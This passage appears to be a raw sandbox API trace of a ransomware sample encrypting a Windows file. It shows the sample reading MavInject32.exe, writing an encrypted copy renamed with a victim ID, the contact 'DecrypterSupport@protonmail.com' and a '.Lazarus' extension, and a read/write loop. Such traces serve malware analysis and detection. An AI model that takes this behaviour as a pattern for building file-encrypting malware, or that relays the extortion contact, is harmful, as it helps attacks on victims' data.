Parameter=0x1086e48, Context=0x0) returned 1 [0095.685] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.685] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.685] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d2c8 | out: hHeap=0x20000) returned 1 [0095.685] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0095.685] AreFileApisANSI () returned 1 [0095.685] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\MavInject32.exe", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\MavInject32.exe", lpUsedDefaultChar=0x0) returned 74 [0095.685] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cea0 [0095.685] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.685] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.685] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0095.686] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0095.686] AreFileApisANSI () returned 1 [0095.686] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cea0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 74 [0095.686] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x94) returned 0x851c0 [0095.686] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cea0, cbMultiByte=-1, lpWideCharStr=0x851c0, cchWideChar=74 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\MavInject32.exe") returned 74 [0095.686] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\MavInject32.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\mavinject32.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0095.686] GetFileType (hFile=0x33c) returned 0x1 [0095.686] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x851c0 | out: hHeap=0x20000) returned 1 [0095.686] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0095.686] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0095.686] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0095.687] CloseHandle (hObject=0x33c) returned 1 [0095.689] AreFileApisANSI () returned 1 [0095.690] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cea0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 74 [0095.690] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x94) returned 0x85300 [0095.690] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cea0, cbMultiByte=-1, lpWideCharStr=0x85300, cchWideChar=74 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\MavInject32.exe") returned 74 [0095.690] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\MavInject32.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\mavinject32.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0095.690] GetFileType (hFile=0x33c) returned 0x1 [0095.690] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85300 | out: hHeap=0x20000) returned 1 [0095.690] CloseHandle (hObject=0x33c) returned 1 [0095.690] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0095.690] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0095.690] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0095.690] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0095.690] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0095.690] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0095.690] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0095.690] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0095.690] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0095.690] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0095.690] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0095.690] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0095.690] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0095.690] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0095.690] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0095.691] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0095.691] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0095.691] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0095.691] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0095.691] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0095.691] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0095.691] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0095.691] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0095.691] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0095.691] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0095.691] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0095.691] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0095.691] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0095.691] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0095.691] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0095.691] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0095.691] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0095.691] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0095.691] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0095.691] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0095.691] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0095.691] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0095.691] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0095.691] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0095.691] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0095.691] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0095.691] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0095.691] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0095.691] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0095.691] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0095.691] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0095.691] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0095.691] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0095.691] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0095.691] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0095.691] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0095.691] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0095.692] AreFileApisANSI () returned 1 [0095.692] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cea0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 74 [0095.692] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x94) returned 0x85800 [0095.692] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cea0, cbMultiByte=-1, lpWideCharStr=0x85800, cchWideChar=74 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\MavInject32.exe") returned 74 [0095.692] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\MavInject32.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\mavinject32.exe"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80b8a5e2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80b8a5e2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xa2e72000, ftLastWriteTime.dwHighDateTime=0x1d0b361, nFileSizeHigh=0x0, nFileSizeLow=0x578d8)) returned 1 [0095.692] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85800 | out: hHeap=0x20000) returned 1 [0095.692] AreFileApisANSI () returned 1 [0095.692] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0095.692] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0095.692] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0095.692] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0095.692] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0095.692] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0095.692] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0095.692] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0095.692] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0095.692] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cd98 [0095.692] GetLastError () returned 0x0 [0095.692] SetLastError (dwErrCode=0x0) [0095.692] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e180 [0095.692] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x49ca0 [0095.692] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8b680 [0095.692] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d588 [0095.692] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d618 [0095.692] GetLastError () returned 0x0 [0095.692] SetLastError (dwErrCode=0x0) [0095.692] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0095.692] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d160 [0095.692] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x77) returned 0x69db0 [0095.692] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d160 | out: hHeap=0x20000) returned 1 [0095.692] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb2) returned 0x55f20 [0095.692] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69db0 | out: hHeap=0x20000) returned 1 [0095.692] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0095.693] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0095.693] AreFileApisANSI () returned 1 [0095.693] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x55f20, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 136 [0095.693] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x110) returned 0x8b798 [0095.693] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x55f20, cbMultiByte=-1, lpWideCharStr=0x8b798, cchWideChar=136 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\MavInject32.exe.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 136 [0095.693] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\MavInject32.exe.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\mavinject32.exe.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0095.693] GetFileType (hFile=0x33c) returned 0x1 [0095.693] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b798 | out: hHeap=0x20000) returned 1 [0095.693] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0095.693] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0095.693] AreFileApisANSI () returned 1 [0095.694] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd98, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 74 [0095.694] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x94) returned 0x854e0 [0095.694] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd98, cbMultiByte=-1, lpWideCharStr=0x854e0, cchWideChar=74 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\MavInject32.exe") returned 74 [0095.694] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\MavInject32.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\mavinject32.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0095.694] GetFileType (hFile=0x418) returned 0x1 [0095.694] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x854e0 | out: hHeap=0x20000) returned 1 [0095.694] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a3b0 [0095.694] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35130 [0095.694] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35230 [0095.694] GetLastError () returned 0x0 [0095.694] SetLastError (dwErrCode=0x0) [0095.694] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35230 | out: hHeap=0x20000) returned 1 [0095.694] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f50 [0095.694] GetLastError () returned 0x0 [0095.694] SetLastError (dwErrCode=0x0) [0095.694] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f50 | out: hHeap=0x20000) returned 1 [0095.694] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35170 [0095.694] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x90450 [0095.694] ReadFile (in: hFile=0x418, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f030*=0x1000, lpOverlapped=0x0) returned 1 [0095.800] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0095.800] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d5a0 [0095.801] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8f448 [0095.801] GetLastError () returned 0x0 [0095.801] SetLastError (dwErrCode=0x0) [0095.801] GetLastError () returned 0x0 [0095.801] SetLastError (dwErrCode=0x0) [0095.819] GetLastError () returned 0x0 [0095.819] SetLastError (dwErrCode=0x0) [0095.819] GetLastError () returned 0x0 [0095.819] SetLastError (dwErrCode=0x0) [0095.830] ReadFile (in: hFile=0x418, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0095.830] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0095.832] GetLastError () returned 0x0 [0095.832] SetLastError (dwErrCode=0x0) [0095.832] GetLastError () returned 0x0 [0095.832] SetLastError (dwErrCode=0x0) [0095.832] GetLastError () returned 0x0 [0095.832] SetLastError (dwErrCode=0x0) [0095.832] GetLastError () returned 0x0 [0095.832] SetLastError (dwErrCode=0x0) [0095.832] ReadFile (in: hFile=0x418, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0095.833] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0095.833] GetLastError () returned 0x0 [0095.833] SetLastError (dwErrCode=0x0) [0095.833] GetLastError () returned 0x0 [0095.833] SetLastError (dwErrCode=0x0) [0095.833] GetLastError () returned 0x0 [0095.833] SetLastError (dwErrCode=0x0) [0095.833] GetLastError () returned 0x0 [0095.833] SetLastError (dwErrCode=0x0) [0095.833] ReadFile (in: hFile=0x418, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0095.833] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0095.834] GetLastError () returned 0x0 [0095.834] SetLastError (dwErrCode=0x0) [0095.834] GetLastError () returned 0x0 [0095.834] SetLastError (dwErrCode=0x0) [0095.834] GetLastError () returned 0x0 [0095.834] SetLastError (dwErrCode=0x0) [0095.834] GetLastError () returned 0x0 [0095.834] SetLastError (dwErrCode=0x0) [0095.834] ReadFile (in: hFile=0x418, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0095.834] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0095.835] GetLastError () returned 0x0 [0095.835] SetLastError (dwErrCode=0x0) [0095.835] GetLastError () returned 0x0 [0095.835] SetLastError (dwErrCode=0x0) [0095.835] GetLastError () returned 0x0 [0095.835] SetLastError (dwErrCode=0x0) [0095.835] GetLastError () returned 0x0 [0095.835] SetLastError (dwErrCode=0x0) [0095.835] ReadFile (in: hFile=0x418, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0095.835] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0095.835] GetLastError () returned 0x0 [0095.835] SetLastError (dwErrCode=0x0) [0095.836] GetLastError () returned 0x0 [0095.836] SetLastError (dwErrCode=0x0) [0095.836] GetLastError () returned 0x0 [0095.836] SetLastError (dwErrCode=0x0) [0095.836] GetLastError () returned 0x0 [0095.836] SetLastError (dwErrCode=0x0) [0095.836] ReadFile (in: hFile=0x418, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0095.836] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0095.836] GetLastError () returned 0x0 [0095.836] SetLastError (dwErrCode=0x0) [0095.836] GetLastError () returned 0x0 [0095.836] SetLastError (dwErrCode=0x0) [0095.837] GetLastError () returned 0x0 [0095.837] SetLastError (dwErrCode=0x0) [0095.837] GetLastError () returned 0x0 [0095.837] SetLastError (dwErrCode=0x0) [0095.837] ReadFile (in: hFile=0x418, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0095.837] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0095.837] GetLastError () returned 0x0 [0095.837] SetLastError (dwErrCode=0x0) [0095.837] GetLastError () returned 0x0 [0095.837] SetLastError (dwErrCode=0x0) [0095.837] GetLastError () returned 0x0 [0095.837] SetLastError (dwErrCode=0x0) [0095.838] GetLastError () returned 0x0 [0095.838] SetLastError (dwErrCode=0x0) [0095.838] ReadFile (in: hFile=0x418, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0095.838] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0095.838] GetLastError () returned 0x0 [0095.838] SetLastError (dwErrCode=0x0) [0095.838] GetLastError () returned 0x0 [0095.838] SetLastError (dwErrCode=0x0) [0095.838] GetLastError () returned 0x0 [0095.838] SetLastError (dwErrCode=0x0) [0095.838] GetLastError () returned 0x0 [0095.838] SetLastError (dwErrCode=0x0) [0095.839] ReadFile (in: hFile=0x418, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0095.839] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0095.839] GetLastError () returned 0x0 [0095.839] SetLastError (dwErrCode=0x0) [0095.839] GetLastError () returned 0x0 [0095.839] SetLastError (dwErrCode=0x0) [0095.839] GetLastError () returned 0x0 [0095.839] SetLastError (dwErrCode=0x0) [0095.839] GetLastError () returned 0x0 [0095.839] SetLastError (dwErrCode=0x0) [0095.839] ReadFile (in: hFile=0x418, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0095.840] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0095.840] GetLastError () returned 0x0 [0095.840] SetLastError (dwErrCode=0x0) [0095.840] GetLastError () returned 0x0 [0095.840] SetLastError (dwErrCode=0x0) [0095.840] GetLastError () returned 0x0 [0095.840] SetLastError (dwErrCode=0x0) [0095.840] GetLastError () returned 0x0 [0095.840] SetLastError (dwErrCode=0x0) [0095.840] ReadFile (in: hFile=0x418, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0095.840] WriteFile (in: 